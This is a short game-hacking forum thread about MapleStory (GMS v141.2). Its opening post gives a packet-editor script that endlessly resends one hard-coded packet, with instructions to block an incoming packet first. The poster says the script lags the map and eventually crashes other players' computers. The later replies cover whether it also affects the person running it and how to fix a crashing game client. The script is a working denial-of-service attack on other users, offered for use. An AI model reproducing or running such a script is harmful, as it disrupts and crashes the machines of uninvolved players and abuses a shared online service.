[GMS v141.2] Map Lag/Map Overload

Posts 1–6 of 6 · Page 1 of 1
[GMS v141.2] Map Lag/Map Overload
Block Recv 0E 02 before running this script.

Code:
program Untitled;
begin
while (true) do
begin
SendPacket('ED 00 00 00 B5 32 49 00 04 8B 03 6E FF 8D 01 FC 00 0C 00 AA 29 27 02 0A 00 00 00 30 75 00 00 0A 00');
end;
end.
It will cause the map to lag. After a while, depending on the persons computer, it'll crash them.

-Credit to Chubbz?
Will it affect us, the Map laggers?
Quote Originally Posted by Mikilox View Post
Will it affect us, the Map laggers?
Yeah sadly, unless you have a decently good computer.
I dont have a decently good but i can get BF3 on Low about 60 fps but anyways, I will test this out soon enough, well, if i get my MapleStory and Angel Processor to work, For some reason MapleStory says It has Stopped Working and tried everything. Look forward.
Quote Originally Posted by Mikilox View Post
I dont have a decently good but i can get BF3 on Low about 60 fps but anyways, I will test this out soon enough, well, if i get my MapleStory and Angel Processor to work, For some reason MapleStory says It has Stopped Working and tried everything. Look forward.
Oh, hopefully this helps. If you are looking for any assistance with fixing Maple I may be able to help.
Quote Originally Posted by Insolent View Post
Oh, hopefully this helps. If you are looking for any assistance with fixing Maple I may be able to help.
Yeah, Well, pm me and i'll let you know later if i still have some problems after reinstall
Posts 1–6 of 6 · Page 1 of 1

Post a Reply

Similar Threads

Tags for this Thread

None

Need help?